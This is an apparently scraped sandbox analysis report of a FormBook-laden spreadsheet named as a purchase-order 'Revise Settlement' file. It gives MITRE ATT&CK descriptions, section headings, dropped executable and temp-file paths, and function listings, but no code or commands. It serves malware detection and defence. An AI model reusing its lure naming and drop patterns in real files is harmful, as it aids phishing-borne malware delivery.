Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF36CD9.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CBD0238.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D623D4F.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EBFD06.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf

C:\Users\user\AppData\Local\Temp\bn5z71pvulub10vjar

C:\Users\user\AppData\Local\Temp\dknqrab

C:\Users\user\AppData\Local\Temp\idcqz.exe

C:\Users\user\AppData\Local\Temp\nswAB85.tmp

C:\Users\user\AppData\Local\Temp\~DF676A4AF24BE52768.TMP

Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Function 037903A2 Relevance: 6.1, APIs: 4, Instructions: 90
libraryCOMMON

Function 03790316 Relevance: 4.6, APIs: 3, Instructions: 145
filenetworkCOMMON

Function 03790332 Relevance: 4.6, APIs: 3, Instructions: 136
filenetworkCOMMON

Function 037903BC Relevance: 4.6, APIs: 3, Instructions: 75
COMMON

Function 03790411 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Function 0379043F Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Function 0379042A Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Function 03790464 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 0379046B Relevance: .0, Instructions: 14
COMMON

Function 037902FD Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 00403646 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 450
stringfilecomCOMMON

Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON